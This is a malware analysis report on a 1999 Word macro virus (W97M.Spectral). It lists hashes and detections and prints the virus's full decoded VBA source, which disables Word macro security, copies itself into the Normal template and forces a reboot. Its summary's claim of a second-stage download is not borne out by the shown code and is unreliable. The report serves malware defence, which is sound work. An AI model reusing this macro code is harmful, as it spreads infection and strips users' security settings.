Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 689a1ca65537856d…

MALICIOUS

Office (OLE)

143.5 KB Created: 1999-07-24 02:57:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f362531bdd049633c15546db8bf2d038 SHA-1: 64bd7e62829d16d79af7265b27ff7995cebc6d94 SHA-256: 689a1ca65537856dccaeae8b58bbe9befa937038795fa133d336c0b38b5dbaf7
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro that executes upon opening the document. This macro attempts to export its own code to 'C:\Av.log' and then import it into the Normal template, indicating an attempt to establish persistence or load additional functionality. The presence of ShellExecute API calls and the ClamAV detection of 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Spectral-1' strongly suggest malicious intent, likely to download and execute a second-stage payload.

Heuristics 4

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Integer, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal wShowCmd As Integer) As Integer
Private Sub Document_Open()
' W97M.Spectral by Draconia

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3700 bytes
SHA-256: 6a17eb67f5a478ec2f3ffc3df94d4e10716df5b9f332542bf9ac8c7ed9937286
Detection
ClamAV: Doc.Trojan.Spectral-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Declare Function ExitWindowsEx Lib "User32" (ByVal fuOptions As Integer, ByVal Reserved As Integer) As Boolean
Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Integer, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal wShowCmd As Integer) As Integer
Private Sub Document_Open()
' W97M.Spectral by Draconia
' Member of Virus Quest
' Copyright@1999
On Error GoTo ErrorDcOe:
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
iMacroNormalDotCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroNormalDotCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "Spectral" Then
        DropScreamInstalled = -1
    End If
Next i
If Not SpectralInstalled Then
    ActiveDocument.VBProject.VBComponents("Spectral").Export "C:\Av.log"
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Av.log"
    NormalTemplate.VBProject.VBComponents("Spectral").CodeModule.DeleteLines 1, 4
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SpectralInstalled") <> "Yes" Then
        System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SpectralInstalled") = "Yes"
        Call Payload
    End If
Else
iMacroActiveDctCount = ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroActiveDctCount
    If ActiveDocument.VBProject.VBComponents(i).Name = "Spectral" Then
        DropScreamDocInstalled = -1
    End If
Next i
If Not SpecDocInstalled Then
    NormalTemplate.VBProject.VBComponents("Spectral").Export "C:\Av.log"
    ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Av.log"
    ActiveDocument.VBProject.VBComponents("Spectral").CodeModule.DeleteLines 1, 4
    ActiveDocument.Save
    With Assistant.NewBalloon
        .Button = msoButtonSetOK
        .Heading = "Tips:"
        .Text = "Get yourself a good quality Anti-Virus software!" & Chr(13) & "Thanks to F-Prot, AVP, NAV, McAffee, Dr Solomon!!!"
        .Show
    End With
End If
End If
ErrorDcOe:
End Sub
Private Sub Payload()
On Error GoTo ErrorPDSc
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
Const EWX_REBOOT As Integer = 2
Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Microsoft Word"
    .Text = "Important:" & Chr(13) & "Becareful, you must reboot your PC, now! I'm outta here!"
    .Show
End With

ExitWindowsEx EWX_REBOOT, 0
ErrorPDSc:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.